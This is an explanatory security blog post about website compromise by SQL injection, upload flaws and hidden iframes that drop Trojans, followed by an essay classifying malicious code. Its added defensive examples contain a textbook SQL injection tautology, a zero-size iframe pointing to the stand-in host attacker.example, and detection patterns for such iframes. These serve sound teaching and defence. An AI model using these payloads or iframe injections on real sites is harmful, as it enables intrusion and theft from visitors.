882..Dangerous Malicious Codes and Vulnerability Websites [ 2.8.10 ]

 





Websites are being hacked all the time now, one after another. When a website is hacked, the damage is not limited to that one site. Most hackers who get into a site do nothing beyond a defacement, and that does no harm to the visitors. The dangerous ones are the hackers who plant malicious code. I want people to understand how serious that is, so I wrote this post drawing on material from the Korea Information Security Agency and from a friend of mine, a bot hacker (a game-password hacker from China).

How hackers attack in order to plant malicious code:



1. Attackers break into their target computers, organisations and websites using SQL injection. Is SQL injection the only way in? No, there are many other attack methods. Whatever the method, what they are after are places that large numbers of users visit, so that they can steal those users' cookies, collect their IP addresses, and so on.

2. Attackers link their own web pages, which carry the malicious code, into the vulnerable website. For this linking they use an iframe.
An iframe is a web page element that loads another web page and runs it inside a frame of a specified size. ....


Example: see how an iframe was inserted into the Planet Myanmar website (the screenshot that illustrated this is not included here).

3. Internet users then visit the websites that the attackers (hackers) have compromised.

4. If the user's computer is not secured, for example it has no up-to-date internet security suite or antivirus, Trojans will easily get onto the computer from such a website.

5. The Trojan then steals the user's information, user IDs and passwords, and sends them back to the address the attacker configured.

This kind of attack is quite common today. It resembles the malware that arrives disguised as an antivirus product when you visit porn or otherwise insecure sites, but it is a step more advanced. It happens on a great many websites, and in about 90 percent of the affected sites the hackers got in through a SQL injection vulnerability and planted the malicious code there.
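The post names SQL injection as the way in for most of these compromises. The following added example (written for this page, not taken from the post or from either of its sources) shows why: the same login check is written once by string concatenation and once with a parameterised query, against a constructed in-memory SQLite table with two made-up users. The classic quote-breaking input makes the concatenated query match every row, while the parameterised query treats it as a literal password and matches nothing.

```python
import sqlite3


def build_demo_db():
    """Constructed demo database: two users in an in-memory table."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)"
    )
    conn.executemany(
        "INSERT INTO users (username, password) VALUES (?, ?)",
        [("alice", "s3cret"), ("bob", "hunter2")],
    )
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """Login check built by string concatenation: the user's input becomes
    part of the SQL text, so a quote character changes the query's meaning."""
    sql = (
        "SELECT username FROM users WHERE username = '" + username
        + "' AND password = '" + password + "'"
    )
    return [row[0] for row in conn.execute(sql)]


def login_safe(conn, username, password):
    """Same check with a parameterised query: the driver passes the input as
    data, never as SQL, so it can only ever match a literal value."""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    return [row[0] for row in conn.execute(sql, (username, password))]


def demo():
    """Run both versions against the same inputs and return the results."""
    conn = build_demo_db()
    tautology = "' OR '1'='1"  # textbook input that closes the quote early
    return {
        # concatenation: WHERE ... AND password = '' OR '1'='1'  -> every row
        "vulnerable": login_vulnerable(conn, "alice", tautology),
        # parameter: the whole string is compared as a password -> no row
        "safe": login_safe(conn, "alice", tautology),
        # the safe version still works for genuine credentials
        "correct_creds": login_safe(conn, "alice", "s3cret"),
    }


if __name__ == "__main__":
    print(demo())
```

The fix is the query shape, not input filtering: escaping quotes by hand is fragile, whereas a bound parameter can never be parsed as SQL. The same placeholder mechanism exists in every mainstream database driver.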
Another route is the upload vulnerability. It arises from the image-upload feature that web boards offer their users, when:
i. the web board does not filter file extensions (webmasters should make sure that extension filtering is enforced in the upload settings);
ii. the path of the uploaded file can easily be discovered by users and attackers; and
iii. the folder holding the uploaded files has been given execute permission.
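The three conditions above map onto three checks an upload handler can make. The following added example (written for this page, not code from the post or from any web board software) is a small Python upload validator and store routine: it accepts exactly one allow-listed extension, confirms the file's leading bytes match that type (point i), stores the file under a random server-side name so its path cannot be derived from the original filename (point ii), and writes it with mode 0644 so it can never be executed (point iii). The sample inputs in `demo()` are constructed for the example.

```python
import os
import re
import secrets
import tempfile

# Allow-listed image extensions with the leading bytes ("magic numbers")
# a genuine file of that type must start with.
ALLOWED_TYPES = {
    "jpg": b"\xff\xd8\xff",
    "png": b"\x89PNG\r\n\x1a\n",
    "gif": b"GIF8",
}

# Exactly one extension, no path separators, no ".." and no second dot,
# so "shell.php", "shell.php.jpg" and "../x.jpg" are all rejected.
SAFE_NAME = re.compile(r"^[A-Za-z0-9_-]{1,64}\.([A-Za-z0-9]{1,5})$")


def check_upload(filename, data):
    """Return (True, ext) for an acceptable image, else (False, reason)."""
    m = SAFE_NAME.match(filename)
    if not m:
        return False, "bad filename"
    ext = m.group(1).lower()
    if ext not in ALLOWED_TYPES:
        return False, "extension not allowed"
    if not data.startswith(ALLOWED_TYPES[ext]):
        return False, "content does not match extension"
    return True, ext


def store_upload(upload_dir, filename, data):
    """Validate the upload, then write it under a random name with no execute bit."""
    ok, info = check_upload(filename, data)
    if not ok:
        raise ValueError(info)
    # Random server-side name: the client's filename never reaches the disk,
    # so the stored path cannot be guessed from it.
    stored = secrets.token_hex(16) + "." + info
    path = os.path.join(upload_dir, stored)
    with open(path, "wb") as f:
        f.write(data)
    os.chmod(path, 0o644)  # readable by the web server, never executable
    return path


def demo():
    """Exercise the checks with constructed sample inputs (not real uploads)."""
    jpeg = b"\xff\xd8\xff\xe0" + b"\x00" * 16     # minimal JPEG-looking header
    script = b"<?php echo 1; ?>"                  # script content, not an image
    with tempfile.TemporaryDirectory() as d:      # assumed stand-in for an upload dir
        path = store_upload(d, "avatar.jpg", jpeg)
        mode = os.stat(path).st_mode
        return {
            "stored_mode_exec": bool(mode & 0o111),               # False
            "real_jpg": check_upload("avatar.jpg", jpeg),          # (True, "jpg")
            "php_ext": check_upload("shell.php", script),          # extension not allowed
            "double_ext": check_upload("shell.php.jpg", jpeg),     # bad filename
            "traversal": check_upload("../../etc/x.jpg", jpeg),    # bad filename
            "fake_jpg": check_upload("shell.jpg", script),         # content mismatch
        }


if __name__ == "__main__":
    for name, result in demo().items():
        print(name, result)
```

Keep the upload directory outside the web root and serve files through a handler that sets the Content-Type itself; then even a file that slips past the checks is never handed to the server's script interpreter.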

So let me explain a little more about how users are attacked with Trojan files.

Ice Fox Prodigal Web Trojan Generator is a virus creator that can easily be used when attacking websites. (Most hackers, though, write their own code.)


Inside it, an iframe is hidden with width=0. icyfox.htm is then the page that pulls in the backdoor/Trojan files containing icyfox.js; in other words, that .js file holds the code that carries out whatever the hacker has scripted.
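The zero-width iframe described here, and the injected iframe of point 2 above, leave a recognisable trace in the page source, which is what a site owner can check for. The following added example (written for this page, not code from the post, from the generator it names, or from the Planet Myanmar site) scans a page's HTML with Python's standard `html.parser` and reports iframes that are zero-sized, hidden with CSS, or pointing at a host other than the site's own. The sample page and the `attacker.example` host are constructed for the example; only the file name icyfox.htm comes from the post.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# A width/height attribute that is zero: "0", "00", "0px", "0%", "0.0"
ZERO_ATTR = re.compile(r"^0+(\.0+)?(px|%|em)?$")
# The same condition written inside an inline style declaration
CSS_ZERO = re.compile(
    r"(?:^|;)\s*(?:width|height)\s*:\s*0+(?:\.0+)?(?:px|%|em)?\s*(?:;|$)"
)
CSS_HIDDEN = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden")


class IframeCollector(HTMLParser):
    """Collects the attributes of every <iframe> start tag in a document."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "iframe":
            self.iframes.append({k.lower(): (v or "") for k, v in attrs})


def iframe_reasons(attrs, page_host):
    """Return the reasons this iframe looks injected (empty list if none)."""
    reasons = []
    style = attrs.get("style", "").lower()
    zero_attr = any(
        ZERO_ATTR.match(attrs.get(d, "").strip()) for d in ("width", "height")
    )
    if zero_attr or CSS_ZERO.search(style):
        reasons.append("zero-size")
    if CSS_HIDDEN.search(style):
        reasons.append("css-hidden")
    host = urlparse(attrs.get("src", "").strip()).netloc.lower()
    if host and host != page_host.lower():
        reasons.append("off-site")
    return reasons


def scan_html(html, page_host):
    """Parse one page and return the iframes that deserve a closer look."""
    parser = IframeCollector()
    parser.feed(html)
    parser.close()
    hits = []
    for attrs in parser.iframes:
        reasons = iframe_reasons(attrs, page_host)
        if reasons:
            hits.append({"src": attrs.get("src", ""), "reasons": reasons})
    return hits


# Constructed sample page (not the real Planet Myanmar markup): one legitimate
# same-site widget, one zero-size off-site frame of the kind the post
# describes, and one frame hidden with CSS.
SAMPLE_HTML = """<html><body>
<h1>Planet</h1>
<iframe src="/widgets/weather.html" width="300" height="200"></iframe>
<iframe src="http://attacker.example/icyfox.htm" width=0 height=0></iframe>
<iframe src="/ads.html" style="display: none"></iframe>
</body></html>"""

if __name__ == "__main__":
    for hit in scan_html(SAMPLE_HTML, "planet.example"):
        print(hit["src"], ",".join(hit["reasons"]))
```

Run this over a fresh copy of each page fetched from the live site, not from the source repository, because the injected tag lives in the deployed files or in database-backed content. An off-site iframe is not proof of compromise on its own (embedded videos and ad slots are off-site too), so a reviewer should compare the hits against the embeds the site is known to use.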

That is how the malicious code gets planted. Trojans end up installed on almost every computer that visits the malicious website. The attacker then uses web-based UI programs to steal files and folders from those computers, to get remote access, and to control the internet users' computers as they please. In this way, in China in about 2005, roughly 1,216 people were affected within 34 hours, from 16 to 17 October.

As a web administrator you must know your website's rewrite rules, check constantly for security holes, and block script uploading and execution by users. Once an attacker can run a malicious script, it is not just the one site at risk: they can reach the server's root. Pay special attention to image-uploading modules on web boards.






Ref: worldwidemyanmar

***********************************************************************************************************************************************************************************************

Malicious Codes in Depth


Abstract



Malicious code refers to a broad category of software threats to your network and systems. Perhaps the most sophisticated threats to computer systems are posed by malicious code that exploits vulnerabilities in those systems. Any code that modifies or destroys data, steals data, allows unauthorized access, exploits or damages a system, or does something the user did not intend is called malicious code. This paper briefly introduces the various types of malicious code you will encounter, including viruses, Trojan horses, logic bombs and worms.


Taxonomy of Malicious Code



A computer program is a sequence of instructions composed to achieve a desired functionality; the program is termed malicious when that sequence of instructions is used to intentionally cause adverse effects on the system. In other words, we cannot call every "bug" malicious code. Malicious code is also called a programmed threat. The following figure provides an overall taxonomy of malicious code.

Figure 1: Malicious Code Taxonomy (figure not reproduced here)

Taxonomy is a system of classification that allows one to uniquely identify something. As presented in the figure above, threats can be divided into two categories:
  • Independent: self-contained programs that can be scheduled and run by the operating system.
  • Needs a host program: essentially fragments of programs that cannot exist independently of some actual application program, utility or system program.
You must also differentiate between software threats that do not replicate and those that do. (Replication is the process by which code reproduces or duplicates itself.) The former are fragments of programs that are activated when the host program is invoked to perform a specific function; the latter consist of either a program fragment or an independent program (worm, zombie) that, when executed, may produce one or more copies of itself to be activated later on the same system or on some other system. In the following, I briefly survey each of these kinds of malicious software.


Trap doors



defined - 1. syn. back door; a bad thing. 2. A trap-door function is one which is easy to compute but very difficult to compute the inverse of. [Jargon Dictionary]
A trap door is a secret entry point into a program that allows someone who is aware of the trap door to gain access without going through the usual security access procedure. In many cases attacks using trap doors can give a great degree of access to the application, to important data, or even to the hosting system. Trap doors have been used legitimately by programmers to debug and test programs; some of the legitimate reasons for trap doors are:
  1. Intentionally left in to make testing easier.
  2. Intentionally left in as a covert means of access; in other words, to allow access in the event of errors.
  3. Intentionally left in for fixing bugs.
But they may also be used illegitimately, to provide future, illegal access. Trap doors become threats when they are used by unscrupulous programmers to gain unauthorized access.

Back door is another name for a trap door. Back doors provide immediate access to a system by bypassing the authentication and security protocols in use; attackers can use back doors to bypass security controls and gain control of a system without time-consuming hacking.


Logic Bombs



defined - A logic bomb is code embedded in some legitimate program that executes when certain predefined events occur; such code is surreptitiously inserted into an application or operating system and causes it to perform some destructive or security-compromising activity whenever the specified conditions are met. [Jargon Dictionary]

A bomb may send a note to an attacker when a user is logged on to the internet and is using a specific program such as a word processor; this message informs the attacker that the user is ready for an attack. Figure 2 shows a logic bomb in operation. Notice that this bomb does not actually begin the attack but tells the attacker that the victim has reached the state needed for an attack to begin.

Figure 2: Logic Bombs (figure not reproduced here; its steps are listed below)

  1. Attacker implants logic bomb
  2. Victim reports installation
  3. Attacker sends attack message
  4. Victim does as the logic bomb installation directs
Examples of conditions that can be used as triggers for a logic bomb are the presence or absence of certain files, a particular day of the week or date, or a particular user running the application. Once triggered, a bomb may alter or delete data or entire files, cause a machine to halt, or do some other damage.


Trojan Horses



defined - "A malicious, security-breaking program that is disguised as something benign, such as a directory lister, archiver, game, or (in one notorious 1990 case on the Mac) a program to find and destroy viruses!" [Jargon Dictionary]

A Trojan horse is a useful, or apparently useful, program or command procedure containing hidden code that, when invoked, performs some unwanted or harmful function. Trojan horses can be used to accomplish indirectly functions that an unauthorized user could not accomplish directly. For example, to gain access to the files of another user on a shared system, a user could create a Trojan horse program that, when executed, changes the invoking user's file permissions so that the files are readable by any user. Another example of a Trojan horse is a compiler that has been modified to insert additional code into certain programs as they are compiled, such as a system login program; the inserted code creates a trap door in the login program that permits the author to log on to the system using a special password. Another common motivation for the Trojan horse is data destruction:
the program appears to be performing a useful function, but it may also be quietly deleting the victim's files.


Zombie



A zombie is a program that secretly takes over another internet-attached computer and then uses that computer to launch attacks that are difficult to trace to the zombie's creator. Zombies are used in denial-of-service attacks, typically against targeted websites. The zombie is planted on hundreds of computers belonging to unsuspecting third parties and then used to overwhelm the target website with an onslaught of internet traffic.



